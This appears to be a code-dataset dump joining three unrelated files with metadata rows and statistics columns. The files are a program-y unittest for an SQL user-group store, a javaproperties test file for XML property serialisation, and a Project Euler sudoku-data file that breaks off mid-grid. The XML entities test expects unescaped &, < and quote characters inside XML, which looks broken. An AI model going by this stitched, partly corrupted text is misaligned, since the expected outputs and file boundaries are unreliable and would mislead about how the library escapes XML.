2016-12-07T10:30:28.000Z
|
2022-02-08T21:28:33.000Z
|
test/programytest/storage/stores/sql/store/test_usergroups.py
|
VProgramMist/modified-program-y
|
f32efcafafd773683b3fe30054d5485fe9002b7d
|
[
"MIT"
] | 159
|
2016-11-28T18:59:30.000Z
|
2022-03-20T18:02:44.000Z
|
import yaml
import unittest.mock
from unittest.mock import patch
import programytest.storage.engines as Engines
from programy.storage.stores.sql.config import SQLStorageConfiguration
from programy.storage.stores.sql.engine import SQLStorageEngine
from programy.storage.stores.sql.store.usergroups import SQLUserGroupStore
from programytest.storage.asserts.store.assert_usergroups import UserGroupsStoreAsserts
from programy.security.authorise.usergroupsauthorisor import BasicUserGroupAuthorisationService
from programy.config.brain.security import BrainSecurityAuthorisationConfiguration
from programy.security.authorise.usergroups import User
from programy.security.authorise.authorisor import AuthorisationException
class SQLUserGroupStoreTests(UserGroupsStoreAsserts):
    """Tests for SQLUserGroupStore backed by a freshly initialised SQL engine.

    Every test previously repeated the same four-line engine/store setup;
    that boilerplate is factored into :meth:`_new_store`.
    """

    def _new_store(self):
        # One-line purpose: build a SQLUserGroupStore on a newly initialised engine.
        config = SQLStorageConfiguration()
        engine = SQLStorageEngine(config)
        engine.initialise()
        return SQLUserGroupStore(engine)

    @unittest.skipIf(Engines.sql is False, Engines.sql_disabled)
    def test_initialise(self):
        # Setup kept inline here because the test asserts on the engine itself.
        config = SQLStorageConfiguration()
        engine = SQLStorageEngine(config)
        engine.initialise()
        store = SQLUserGroupStore(engine)
        self.assertEqual(store.storage_engine, engine)

    @unittest.skipIf(Engines.sql is False, Engines.sql_disabled)
    def test_get_all(self):
        store = self._new_store()
        with self.assertRaises(Exception):
            store._get_all()

    @unittest.skipIf(Engines.sql is False, Engines.sql_disabled)
    def test_upload_from_file(self):
        store = self._new_store()
        self.assert_upload_from_file(store)

    def patch_read_yaml_from_file(self, filename):
        # Patch target used below to force the store's YAML reader to fail.
        raise Exception("Mock Exception")

    @unittest.skipIf(Engines.sql is False, Engines.sql_disabled)
    @patch("programy.storage.stores.sql.store.usergroups.SQLUserGroupStore._read_yaml_from_file",
           patch_read_yaml_from_file)
    def test_upload_from_file_exception(self):
        store = self._new_store()
        self.assert_upload_from_file_exception(store)

    @unittest.skipIf(Engines.sql is False, Engines.sql_disabled)
    def test_upload_from_file_no_collection(self):
        store = self._new_store()
        self.assert_upload_from_file_no_collection(store)

    @unittest.skipIf(Engines.sql is False, Engines.sql_disabled)
    def test_load_users_user_groups(self):
        user = User("console")
        store = self._new_store()
        yaml_data = yaml.load("""
        groups:
          sysadmin, localuser
        """, Loader=yaml.FullLoader)
        store._load_users_user_groups(yaml_data, user, "console")
        self.assertTrue("sysadmin" in user.groups)
        self.assertTrue("localuser" in user.groups)
        self.assertFalse("other" in user.groups)

    @unittest.skipIf(Engines.sql is False, Engines.sql_disabled)
    def test_load_users_user_groups_duplicates(self):
        user = User("console")
        store = self._new_store()
        yaml_data = yaml.load("""
        groups:
          sysadmin, localuser, localuser
        """, Loader=yaml.FullLoader)
        store._load_users_user_groups(yaml_data, user, "console")
        self.assertTrue("sysadmin" in user.groups)
        self.assertTrue("localuser" in user.groups)
        self.assertFalse("other" in user.groups)

    @unittest.skipIf(Engines.sql is False, Engines.sql_disabled)
    def test_load_users_user_roles(self):
        user = User("console")
        store = self._new_store()
        yaml_data = yaml.load("""
        roles:
          su, local
        """, Loader=yaml.FullLoader)
        store._load_users_user_roles(yaml_data, user, "console")
        self.assertTrue("su" in user.roles)
        self.assertTrue("local" in user.roles)
        self.assertFalse("other" in user.roles)

    @unittest.skipIf(Engines.sql is False, Engines.sql_disabled)
    def test_load_users_user_roles_duplicates(self):
        user = User("console")
        store = self._new_store()
        yaml_data = yaml.load("""
        roles:
          su, local, su
        """, Loader=yaml.FullLoader)
        store._load_users_user_roles(yaml_data, user, "console")
        self.assertTrue("su" in user.roles)
        self.assertTrue("local" in user.roles)
        self.assertFalse("other" in user.roles)

    @unittest.skipIf(Engines.sql is False, Engines.sql_disabled)
    def test_load_users(self):
        store = self._new_store()
        yaml_data = yaml.load("""
        users:
          console:
            roles:
              user
            groups:
              sysadmin, local
          viewer:
            roles:
              user
            groups:
              local
        """, Loader=yaml.FullLoader)
        store._upload_users(yaml_data, verbose=False)
        authorisor = BasicUserGroupAuthorisationService(BrainSecurityAuthorisationConfiguration())
        store.load_usergroups(authorisor)
        self.assertTrue("console" in authorisor.users)
        self.assertTrue("viewer" in authorisor.users)
        self.assertFalse("sysadmin" in authorisor.groups)
        self.assertFalse("local" in authorisor.groups)
        self.assertTrue(authorisor.authorise("console", "user"))
        self.assertTrue(authorisor.authorise("viewer", "user"))

    @unittest.skipIf(Engines.sql is False, Engines.sql_disabled)
    def test_load_users_verbose(self):
        store = self._new_store()
        yaml_data = yaml.load("""
        users:
          console:
            roles:
              user
            groups:
              sysadmin, local
          viewer:
            roles:
              user
            groups:
              local
        """, Loader=yaml.FullLoader)
        store.load_from_yaml(yaml_data, verbose=True)
        authorisor = BasicUserGroupAuthorisationService(BrainSecurityAuthorisationConfiguration())
        store.load_usergroups(authorisor)
        self.assertTrue("console" in authorisor.users)
        self.assertTrue("viewer" in authorisor.users)
        self.assertFalse("sysadmin" in authorisor.groups)
        self.assertFalse("local" in authorisor.groups)
        self.assertTrue(authorisor.authorise("console", "user"))
        self.assertTrue(authorisor.authorise("viewer", "user"))

    @unittest.skipIf(Engines.sql is False, Engines.sql_disabled)
    def test_load_users_no_users(self):
        store = self._new_store()
        yaml_data = yaml.load("""
        other:
          console:
            roles:
              user
            groups:
              sysadmin, local
          viewer:
            roles:
              user
            groups:
              local
        """, Loader=yaml.FullLoader)
        store._upload_users(yaml_data, verbose=True)
        authorisor = BasicUserGroupAuthorisationService(BrainSecurityAuthorisationConfiguration())
        store.load_usergroups(authorisor)
        self.assertFalse("console" in authorisor.users)
        self.assertFalse("viewer" in authorisor.users)
        self.assertFalse("sysadmin" in authorisor.groups)
        self.assertFalse("local" in authorisor.groups)
        with self.assertRaises(AuthorisationException):
            authorisor.authorise("console", "user")
        with self.assertRaises(AuthorisationException):
            authorisor.authorise("viewer", "user")

    @unittest.skipIf(Engines.sql is False, Engines.sql_disabled)
    def test_load_users_no_roles(self):
        store = self._new_store()
        yaml_data = yaml.load("""
        users:
          console:
            groups:
              sysadmin, local
          viewer:
            groups:
              local
        """, Loader=yaml.FullLoader)
        store._upload_users(yaml_data, verbose=True)
        authorisor = BasicUserGroupAuthorisationService(BrainSecurityAuthorisationConfiguration())
        store.load_usergroups(authorisor)
        self.assertTrue("console" in authorisor.users)
        self.assertTrue("viewer" in authorisor.users)
        self.assertFalse("sysadmin" in authorisor.groups)
        self.assertFalse("local" in authorisor.groups)
        self.assertFalse(authorisor.authorise("console", "user"))
        self.assertFalse(authorisor.authorise("viewer", "user"))

    @unittest.skipIf(Engines.sql is False, Engines.sql_disabled)
    def test_load_users_no_groups(self):
        store = self._new_store()
        yaml_data = yaml.load("""
        users:
          console:
            roles:
              user
          viewer:
            roles:
              user
        """, Loader=yaml.FullLoader)
        store._upload_users(yaml_data, verbose=True)
        authorisor = BasicUserGroupAuthorisationService(BrainSecurityAuthorisationConfiguration())
        store.load_usergroups(authorisor)
        self.assertTrue("console" in authorisor.users)
        self.assertTrue("viewer" in authorisor.users)
        self.assertFalse("sysadmin" in authorisor.groups)
        self.assertFalse("local" in authorisor.groups)
        self.assertTrue(authorisor.authorise("console", "user"))
        self.assertTrue(authorisor.authorise("viewer", "user"))

    @unittest.skipIf(Engines.sql is False, Engines.sql_disabled)
    def test_load_groups(self):
        store = self._new_store()
        store.empty()
        yaml_data = yaml.load("""
        groups:
          group1:
            roles:
              role1, role2, role3
            groups:
              group1, group2
            users:
              user1, user2
          group2:
            roles:
              role4, role5
            groups:
              group3
            users:
              user3
        """, Loader=yaml.FullLoader)
        store._upload_groups(yaml_data, verbose=False)
        authorisor = BasicUserGroupAuthorisationService(BrainSecurityAuthorisationConfiguration())
        store.load_usergroups(authorisor)
        self.assertTrue("group1" in authorisor.groups)
        self.assertTrue("group2" in authorisor.groups)
        self.assertTrue(authorisor.groups)

    @unittest.skipIf(Engines.sql is False, Engines.sql_disabled)
    def test_load_groups_verbose(self):
        store = self._new_store()
        yaml_data = yaml.load("""
        groups:
          group1:
            roles:
              role1, role2, role3
            groups:
              group1, group2
            users:
              user1, user2
          group2:
            roles:
              role4, role5
            groups:
              group3
            users:
              user3
        """, Loader=yaml.FullLoader)
        store._upload_groups(yaml_data, verbose=True)
        authorisor = BasicUserGroupAuthorisationService(BrainSecurityAuthorisationConfiguration())
        store.load_usergroups(authorisor)

    @unittest.skipIf(Engines.sql is False, Engines.sql_disabled)
    def test_load_groups_no_groups(self):
        store = self._new_store()
        yaml_data = yaml.load("""
        other:
          group1:
            roles:
              role1, role2, role3
            groups:
              group1, group2
            users:
              user1, user2
          group2:
            roles:
              role4, role5
            groups:
              group3
            users:
              user3
        """, Loader=yaml.FullLoader)
        store._upload_groups(yaml_data, verbose=False)
        authorisor = BasicUserGroupAuthorisationService(BrainSecurityAuthorisationConfiguration())
        store.load_usergroups(authorisor)

    @unittest.skipIf(Engines.sql is False, Engines.sql_disabled)
    def test_load_groups_no_group_roles(self):
        store = self._new_store()
        yaml_data = yaml.load("""
        groups:
          group1:
            groups:
              group1, group2
            users:
              user1, user2
          group2:
            groups:
              group3
            users:
              user3
        """, Loader=yaml.FullLoader)
        store._upload_groups(yaml_data, verbose=False)
        authorisor = BasicUserGroupAuthorisationService(BrainSecurityAuthorisationConfiguration())
        store.load_usergroups(authorisor)

    @unittest.skipIf(Engines.sql is False, Engines.sql_disabled)
    def test_load_groups_no_group_groups(self):
        store = self._new_store()
        yaml_data = yaml.load("""
        groups:
          group1:
            roles:
              role1, role2, role3
            users:
              user1, user2
          group2:
            roles:
              role4, role5
            users:
              user3
        """, Loader=yaml.FullLoader)
        store._upload_groups(yaml_data, verbose=False)
        authorisor = BasicUserGroupAuthorisationService(BrainSecurityAuthorisationConfiguration())
        store.load_usergroups(authorisor)

    @unittest.skipIf(Engines.sql is False, Engines.sql_disabled)
    def test_load_groups_no_group_users(self):
        store = self._new_store()
        yaml_data = yaml.load("""
        groups:
          group1:
            roles:
              role1, role2, role3
            groups:
              group1, group2
          group2:
            roles:
              role4, role5
            groups:
              group3
        """, Loader=yaml.FullLoader)
        store._upload_groups(yaml_data, verbose=False)
        authorisor = BasicUserGroupAuthorisationService(BrainSecurityAuthorisationConfiguration())
        store.load_usergroups(authorisor)

    @unittest.skipIf(Engines.sql is False, Engines.sql_disabled)
    def test_load_usergroups(self):
        store = self._new_store()
        yaml_data = yaml.load("""
        users:
          user1:
            groups:
              group1
          user2:
            groups:
              group4
          user3:
            groups:
              group1
        groups:
          group1:
            roles:
              role1, role2, role3
            groups:
              group1, group2
            users:
              user1, user2
          group2:
            roles:
              role4, role5
            groups:
              group5
            users:
              user3
          group3:
            roles:
              role6
        """, Loader=yaml.FullLoader)
        store.load_from_yaml(yaml_data, verbose=False)
        store.commit()
        authorisor = BasicUserGroupAuthorisationService(BrainSecurityAuthorisationConfiguration())
        store.load_usergroups(authorisor)
        self.assertTrue("user1" in authorisor.users)
        self.assertTrue("user2" in authorisor.users)
        self.assertTrue("user3" in authorisor.users)
        self.assertTrue("group1" in authorisor.groups)
        self.assertTrue("group2" in authorisor.groups)
        self.assertTrue("group3" in authorisor.groups)
        self.assertTrue(authorisor.authorise("user3", "role3"))
| 32.071823
| 98
| 0.615619
| 1,531
| 17,415
| 6.866101
| 0.060091
| 0.039954
| 0.041952
| 0.047945
| 0.903919
| 0.874429
| 0.85312
| 0.841134
| 0.841134
| 0.824486
| 0
| 0.008041
| 0.300201
| 17,415
| 543
| 99
| 32.071823
| 0.854517
| 0
| 0
| 0.834842
| 0
| 0
| 0.24845
| 0.004766
| 0
| 0
| 0
| 0
| 0.133484
| 1
| 0.049774
| false
| 0
| 0.027149
| 0
| 0.079186
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
491fe011eee61376f93c6fa1a125b2cde5353a1a
| 3,469
|
py
|
Python
|
test/test_dumps_xml.py
|
asantoso/javaproperties
|
2ca21bd4a69feecde77444c536ff62c221b390e3
|
[
"MIT"
] | null | null | null |
test/test_dumps_xml.py
|
asantoso/javaproperties
|
2ca21bd4a69feecde77444c536ff62c221b390e3
|
[
"MIT"
] | null | null | null |
test/test_dumps_xml.py
|
asantoso/javaproperties
|
2ca21bd4a69feecde77444c536ff62c221b390e3
|
[
"MIT"
] | null | null | null |
from __future__ import unicode_literals
from collections import OrderedDict
from javaproperties import dumps_xml
def test_dumps_xml_nothing():
    """An empty mapping serializes to a properties document with no entries."""
    expected = '''\
<!DOCTYPE properties SYSTEM "http://java.sun.com/dtd/properties.dtd">
<properties>
</properties>
'''
    assert dumps_xml({}) == expected
def test_dumps_xml_simple():
    """A single key/value pair becomes one <entry> element."""
    expected = '''\
<!DOCTYPE properties SYSTEM "http://java.sun.com/dtd/properties.dtd">
<properties>
<entry key="key">value</entry>
</properties>
'''
    assert dumps_xml({"key": "value"}) == expected
def test_dumps_xml_two_simple():
    """Pairs given as a list keep their input order."""
    expected = '''\
<!DOCTYPE properties SYSTEM "http://java.sun.com/dtd/properties.dtd">
<properties>
<entry key="key">value</entry>
<entry key="zebra">apple</entry>
</properties>
'''
    assert dumps_xml([("key", "value"), ("zebra", "apple")]) == expected
def test_dumps_xml_two_simple_rev():
    """Reversed input order is preserved in the output."""
    expected = '''\
<!DOCTYPE properties SYSTEM "http://java.sun.com/dtd/properties.dtd">
<properties>
<entry key="zebra">apple</entry>
<entry key="key">value</entry>
</properties>
'''
    assert dumps_xml([("zebra", "apple"), ("key", "value")]) == expected
def test_dumps_xml_two_simple_sorted():
    """sort_keys=True keeps already-sorted input in key order."""
    expected = '''\
<!DOCTYPE properties SYSTEM "http://java.sun.com/dtd/properties.dtd">
<properties>
<entry key="key">value</entry>
<entry key="zebra">apple</entry>
</properties>
'''
    actual = dumps_xml(
        [("key", "value"), ("zebra", "apple")],
        sort_keys=True,
    )
    assert actual == expected
def test_dumps_xml_two_simple_rev_sorted():
    """sort_keys=True reorders reversed input into key order."""
    expected = '''\
<!DOCTYPE properties SYSTEM "http://java.sun.com/dtd/properties.dtd">
<properties>
<entry key="key">value</entry>
<entry key="zebra">apple</entry>
</properties>
'''
    actual = dumps_xml(
        [("zebra", "apple"), ("key", "value")],
        sort_keys=True,
    )
    assert actual == expected
def test_dumps_xml_ordereddict():
    """An OrderedDict serializes in its insertion order."""
    expected = '''\
<!DOCTYPE properties SYSTEM "http://java.sun.com/dtd/properties.dtd">
<properties>
<entry key="key">value</entry>
<entry key="zebra">apple</entry>
</properties>
'''
    assert dumps_xml(OrderedDict([("key","value"), ("zebra","apple")])) == expected
def test_dumps_xml_ordereddict_rev():
    """Reversed OrderedDict insertion order is preserved."""
    expected = '''\
<!DOCTYPE properties SYSTEM "http://java.sun.com/dtd/properties.dtd">
<properties>
<entry key="zebra">apple</entry>
<entry key="key">value</entry>
</properties>
'''
    assert dumps_xml(OrderedDict([("zebra","apple"), ("key","value")])) == expected
def test_dumps_xml_ordereddict_sorted():
    """sort_keys=True keeps a sorted OrderedDict in key order."""
    expected = '''\
<!DOCTYPE properties SYSTEM "http://java.sun.com/dtd/properties.dtd">
<properties>
<entry key="key">value</entry>
<entry key="zebra">apple</entry>
</properties>
'''
    actual = dumps_xml(
        OrderedDict([("key", "value"), ("zebra", "apple")]),
        sort_keys=True,
    )
    assert actual == expected
def test_dumps_xml_ordereddict_rev_sorted():
    """sort_keys=True reorders a reverse-ordered OrderedDict into key order."""
    expected = '''\
<!DOCTYPE properties SYSTEM "http://java.sun.com/dtd/properties.dtd">
<properties>
<entry key="key">value</entry>
<entry key="zebra">apple</entry>
</properties>
'''
    actual = dumps_xml(
        OrderedDict([("zebra", "apple"), ("key", "value")]),
        sort_keys=True,
    )
    assert actual == expected
def test_dumps_xml_comment():
    """The comment keyword argument emits a <comment> element before entries."""
    expected = '''\
<!DOCTYPE properties SYSTEM "http://java.sun.com/dtd/properties.dtd">
<properties>
<comment>This is a comment.</comment>
<entry key="key">value</entry>
</properties>
'''
    assert dumps_xml({"key": "value"}, comment='This is a comment.') == expected
def test_dumps_xml_entities():
    """XML-special characters in keys, values, and comments round-trip."""
    # NOTE(review): expected output shows the special characters unescaped;
    # verify against the library's actual entity-escaping behavior.
    expected = '''\
<!DOCTYPE properties SYSTEM "http://java.sun.com/dtd/properties.dtd">
<properties>
<comment>&<>"'</comment>
<entry key="&<>"'">&<>"'</entry>
</properties>
'''
    assert dumps_xml({'&<>"\'': '&<>"\''}, comment='&<>"\'') == expected
| 28.669421
| 79
| 0.659268
| 435
| 3,469
| 5.096552
| 0.098851
| 0.090212
| 0.064953
| 0.081191
| 0.897158
| 0.85521
| 0.846189
| 0.815968
| 0.770862
| 0.770862
| 0
| 0
| 0.11646
| 3,469
| 120
| 80
| 28.908333
| 0.723328
| 0
| 0
| 0.722222
| 0
| 0
| 0.604209
| 0.14817
| 0
| 0
| 0
| 0
| 0.111111
| 1
| 0.111111
| true
| 0
| 0.027778
| 0
| 0.138889
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
4924b704b9c29e0a653b674acdbf7bcd84eecae4
| 10,626
|
py
|
Python
|
data/p096.py
|
joetache4/ProjectEuler
|
f101e927d73dbafa11af1b208992bf0d830c88b1
|
[
"MIT"
] | null | null | null |
data/p096.py
|
joetache4/ProjectEuler
|
f101e927d73dbafa11af1b208992bf0d830c88b1
|
[
"MIT"
] | null | null | null |
data/p096.py
|
joetache4/ProjectEuler
|
f101e927d73dbafa11af1b208992bf0d830c88b1
|
[
"MIT"
] | null | null | null |
def get_data():
    """Return the 50 sudoku puzzles of Project Euler problem 96.

    Each puzzle is a 9x9 grid encoded as a list of nine row lists of
    ints; digits 1-9 are given clues and 0 marks an empty cell.
    """
    # The original wrapped every line in a backslash continuation; those
    # are redundant inside a bracketed literal and have been removed.
    return [[
        [0,0,3,0,2,0,6,0,0],
        [9,0,0,3,0,5,0,0,1],
        [0,0,1,8,0,6,4,0,0],
        [0,0,8,1,0,2,9,0,0],
        [7,0,0,0,0,0,0,0,8],
        [0,0,6,7,0,8,2,0,0],
        [0,0,2,6,0,9,5,0,0],
        [8,0,0,2,0,3,0,0,9],
        [0,0,5,0,1,0,3,0,0]
    ], [
        [2,0,0,0,8,0,3,0,0],
        [0,6,0,0,7,0,0,8,4],
        [0,3,0,5,0,0,2,0,9],
        [0,0,0,1,0,5,4,0,8],
        [0,0,0,0,0,0,0,0,0],
        [4,0,2,7,0,6,0,0,0],
        [3,0,1,0,0,7,0,4,0],
        [7,2,0,0,4,0,0,6,0],
        [0,0,4,0,1,0,0,0,3]
    ], [
        [0,0,0,0,0,0,9,0,7],
        [0,0,0,4,2,0,1,8,0],
        [0,0,0,7,0,5,0,2,6],
        [1,0,0,9,0,4,0,0,0],
        [0,5,0,0,0,0,0,4,0],
        [0,0,0,5,0,7,0,0,9],
        [9,2,0,1,0,8,0,0,0],
        [0,3,4,0,5,9,0,0,0],
        [5,0,7,0,0,0,0,0,0]
    ], [
        [0,3,0,0,5,0,0,4,0],
        [0,0,8,0,1,0,5,0,0],
        [4,6,0,0,0,0,0,1,2],
        [0,7,0,5,0,2,0,8,0],
        [0,0,0,6,0,3,0,0,0],
        [0,4,0,1,0,9,0,3,0],
        [2,5,0,0,0,0,0,9,8],
        [0,0,1,0,2,0,6,0,0],
        [0,8,0,0,6,0,0,2,0]
    ], [
        [0,2,0,8,1,0,7,4,0],
        [7,0,0,0,0,3,1,0,0],
        [0,9,0,0,0,2,8,0,5],
        [0,0,9,0,4,0,0,8,7],
        [4,0,0,2,0,8,0,0,3],
        [1,6,0,0,3,0,2,0,0],
        [3,0,2,7,0,0,0,6,0],
        [0,0,5,6,0,0,0,0,8],
        [0,7,6,0,5,1,0,9,0]
    ], [
        [1,0,0,9,2,0,0,0,0],
        [5,2,4,0,1,0,0,0,0],
        [0,0,0,0,0,0,0,7,0],
        [0,5,0,0,0,8,1,0,2],
        [0,0,0,0,0,0,0,0,0],
        [4,0,2,7,0,0,0,9,0],
        [0,6,0,0,0,0,0,0,0],
        [0,0,0,0,3,0,9,4,5],
        [0,0,0,0,7,1,0,0,6]
    ], [
        [0,4,3,0,8,0,2,5,0],
        [6,0,0,0,0,0,0,0,0],
        [0,0,0,0,0,1,0,9,4],
        [9,0,0,0,0,4,0,7,0],
        [0,0,0,6,0,8,0,0,0],
        [0,1,0,2,0,0,0,0,3],
        [8,2,0,5,0,0,0,0,0],
        [0,0,0,0,0,0,0,0,5],
        [0,3,4,0,9,0,7,1,0]
    ], [
        [4,8,0,0,0,6,9,0,2],
        [0,0,2,0,0,8,0,0,1],
        [9,0,0,3,7,0,0,6,0],
        [8,4,0,0,1,0,2,0,0],
        [0,0,3,7,0,4,1,0,0],
        [0,0,1,0,6,0,0,4,9],
        [0,2,0,0,8,5,0,0,7],
        [7,0,0,9,0,0,6,0,0],
        [6,0,9,2,0,0,0,1,8]
    ], [
        [0,0,0,9,0,0,0,0,2],
        [0,5,0,1,2,3,4,0,0],
        [0,3,0,0,0,0,1,6,0],
        [9,0,8,0,0,0,0,0,0],
        [0,7,0,0,0,0,0,9,0],
        [0,0,0,0,0,0,2,0,5],
        [0,9,1,0,0,0,0,5,0],
        [0,0,7,4,3,9,0,2,0],
        [4,0,0,0,0,7,0,0,0]
    ], [
        [0,0,1,9,0,0,0,0,3],
        [9,0,0,7,0,0,1,6,0],
        [0,3,0,0,0,5,0,0,7],
        [0,5,0,0,0,0,0,0,9],
        [0,0,4,3,0,2,6,0,0],
        [2,0,0,0,0,0,0,7,0],
        [6,0,0,1,0,0,0,3,0],
        [0,4,2,0,0,7,0,0,6],
        [5,0,0,0,0,6,8,0,0]
    ], [
        [0,0,0,1,2,5,4,0,0],
        [0,0,8,4,0,0,0,0,0],
        [4,2,0,8,0,0,0,0,0],
        [0,3,0,0,0,0,0,9,5],
        [0,6,0,9,0,2,0,1,0],
        [5,1,0,0,0,0,0,6,0],
        [0,0,0,0,0,3,0,4,9],
        [0,0,0,0,0,7,2,0,0],
        [0,0,1,2,9,8,0,0,0]
    ], [
        [0,6,2,3,4,0,7,5,0],
        [1,0,0,0,0,5,6,0,0],
        [5,7,0,0,0,0,0,4,0],
        [0,0,0,0,9,4,8,0,0],
        [4,0,0,0,0,0,0,0,6],
        [0,0,5,8,3,0,0,0,0],
        [0,3,0,0,0,0,0,9,1],
        [0,0,6,4,0,0,0,0,7],
        [0,5,9,0,8,3,2,6,0]
    ], [
        [3,0,0,0,0,0,0,0,0],
        [0,0,5,0,0,9,0,0,0],
        [2,0,0,5,0,4,0,0,0],
        [0,2,0,0,0,0,7,0,0],
        [1,6,0,0,0,0,0,5,8],
        [7,0,4,3,1,0,6,0,0],
        [0,0,0,8,9,0,1,0,0],
        [0,0,0,0,6,7,0,8,0],
        [0,0,0,0,0,5,4,3,7]
    ], [
        [6,3,0,0,0,0,0,0,0],
        [0,0,0,5,0,0,0,0,8],
        [0,0,5,6,7,4,0,0,0],
        [0,0,0,0,2,0,0,0,0],
        [0,0,3,4,0,1,0,2,0],
        [0,0,0,0,0,0,3,4,5],
        [0,0,0,0,0,7,0,0,4],
        [0,8,0,3,0,0,9,0,2],
        [9,4,7,1,0,0,0,8,0]
    ], [
        [0,0,0,0,2,0,0,4,0],
        [0,0,8,0,3,5,0,0,0],
        [0,0,0,0,7,0,6,0,2],
        [0,3,1,0,4,6,9,7,0],
        [2,0,0,0,0,0,0,0,0],
        [0,0,0,5,0,1,2,0,3],
        [0,4,9,0,0,0,7,3,0],
        [0,0,0,0,0,0,0,1,0],
        [8,0,0,0,0,4,0,0,0]
    ], [
        [3,6,1,0,2,5,9,0,0],
        [0,8,0,9,6,0,0,1,0],
        [4,0,0,0,0,0,0,5,7],
        [0,0,8,0,0,0,4,7,1],
        [0,0,0,6,0,3,0,0,0],
        [2,5,9,0,0,0,8,0,0],
        [7,4,0,0,0,0,0,0,5],
        [0,2,0,0,1,8,0,6,0],
        [0,0,5,4,7,0,3,2,9]
    ], [
        [0,5,0,8,0,7,0,2,0],
        [6,0,0,0,1,0,0,9,0],
        [7,0,2,5,4,0,0,0,6],
        [0,7,0,0,2,0,3,0,1],
        [5,0,4,0,0,0,9,0,8],
        [1,0,3,0,8,0,0,7,0],
        [9,0,0,0,7,6,2,0,5],
        [0,6,0,0,9,0,0,0,3],
        [0,8,0,1,0,3,0,4,0]
    ], [
        [0,8,0,0,0,5,0,0,0],
        [0,0,0,0,0,3,4,5,7],
        [0,0,0,0,7,0,8,0,9],
        [0,6,0,4,0,0,9,0,3],
        [0,0,7,0,1,0,5,0,0],
        [4,0,8,0,0,7,0,2,0],
        [9,0,1,0,2,0,0,0,0],
        [8,4,2,3,0,0,0,0,0],
        [0,0,0,1,0,0,0,8,0]
    ], [
        [0,0,3,5,0,2,9,0,0],
        [0,0,0,0,4,0,0,0,0],
        [1,0,6,0,0,0,3,0,5],
        [9,0,0,2,5,1,0,0,8],
        [0,7,0,4,0,8,0,3,0],
        [8,0,0,7,6,3,0,0,1],
        [3,0,8,0,0,0,1,0,4],
        [0,0,0,0,2,0,0,0,0],
        [0,0,5,1,0,4,8,0,0]
    ], [
        [0,0,0,0,0,0,0,0,0],
        [0,0,9,8,0,5,1,0,0],
        [0,5,1,9,0,7,4,2,0],
        [2,9,0,4,0,1,0,6,5],
        [0,0,0,0,0,0,0,0,0],
        [1,4,0,5,0,8,0,9,3],
        [0,2,6,7,0,9,5,8,0],
        [0,0,5,1,0,3,6,0,0],
        [0,0,0,0,0,0,0,0,0]
    ], [
        [0,2,0,0,3,0,0,9,0],
        [0,0,0,9,0,7,0,0,0],
        [9,0,0,2,0,8,0,0,5],
        [0,0,4,8,0,6,5,0,0],
        [6,0,7,0,0,0,2,0,8],
        [0,0,3,1,0,2,9,0,0],
        [8,0,0,6,0,5,0,0,7],
        [0,0,0,3,0,9,0,0,0],
        [0,3,0,0,2,0,0,5,0]
    ], [
        [0,0,5,0,0,0,0,0,6],
        [0,7,0,0,0,9,0,2,0],
        [0,0,0,5,0,0,1,0,7],
        [8,0,4,1,5,0,0,0,0],
        [0,0,0,8,0,3,0,0,0],
        [0,0,0,0,9,2,8,0,5],
        [9,0,7,0,0,6,0,0,0],
        [0,3,0,4,0,0,0,1,0],
        [2,0,0,0,0,0,6,0,0]
    ], [
        [0,4,0,0,0,0,0,5,0],
        [0,0,1,9,4,3,6,0,0],
        [0,0,9,0,0,0,3,0,0],
        [6,0,0,0,5,0,0,0,2],
        [1,0,3,0,0,0,5,0,6],
        [8,0,0,0,2,0,0,0,7],
        [0,0,5,0,0,0,2,0,0],
        [0,0,2,4,3,6,7,0,0],
        [0,3,0,0,0,0,0,4,0]
    ], [
        [0,0,4,0,0,0,0,0,0],
        [0,0,0,0,3,0,0,0,2],
        [3,9,0,7,0,0,0,8,0],
        [4,0,0,0,0,9,0,0,1],
        [2,0,9,8,0,1,3,0,7],
        [6,0,0,2,0,0,0,0,8],
        [0,1,0,0,0,8,0,5,3],
        [9,0,0,0,4,0,0,0,0],
        [0,0,0,0,0,0,8,0,0]
    ], [
        [3,6,0,0,2,0,0,8,9],
        [0,0,0,3,6,1,0,0,0],
        [0,0,0,0,0,0,0,0,0],
        [8,0,3,0,0,0,6,0,2],
        [4,0,0,6,0,3,0,0,7],
        [6,0,7,0,0,0,1,0,8],
        [0,0,0,0,0,0,0,0,0],
        [0,0,0,4,1,8,0,0,0],
        [9,7,0,0,3,0,0,1,4]
    ], [
        [5,0,0,4,0,0,0,6,0],
        [0,0,9,0,0,0,8,0,0],
        [6,4,0,0,2,0,0,0,0],
        [0,0,0,0,0,1,0,0,8],
        [2,0,8,0,0,0,5,0,1],
        [7,0,0,5,0,0,0,0,0],
        [0,0,0,0,9,0,0,8,4],
        [0,0,3,0,0,0,6,0,0],
        [0,6,0,0,0,3,0,0,2]
    ], [
        [0,0,7,2,5,6,4,0,0],
        [4,0,0,0,0,0,0,0,5],
        [0,1,0,0,3,0,0,6,0],
        [0,0,0,5,0,8,0,0,0],
        [0,0,8,0,6,0,2,0,0],
        [0,0,0,1,0,7,0,0,0],
        [0,3,0,0,7,0,0,9,0],
        [2,0,0,0,0,0,0,0,4],
        [0,0,6,3,1,2,7,0,0]
    ], [
        [0,0,0,0,0,0,0,0,0],
        [0,7,9,0,5,0,1,8,0],
        [8,0,0,0,0,0,0,0,7],
        [0,0,7,3,0,6,8,0,0],
        [4,5,0,7,0,8,0,9,6],
        [0,0,3,5,0,2,7,0,0],
        [7,0,0,0,0,0,0,0,5],
        [0,1,6,0,3,0,4,2,0],
        [0,0,0,0,0,0,0,0,0]
    ], [
        [0,3,0,0,0,0,0,8,0],
        [0,0,9,0,0,0,5,0,0],
        [0,0,7,5,0,9,2,0,0],
        [7,0,0,1,0,5,0,0,8],
        [0,2,0,0,9,0,0,3,0],
        [9,0,0,4,0,2,0,0,1],
        [0,0,4,2,0,7,1,0,0],
        [0,0,2,0,0,0,8,0,0],
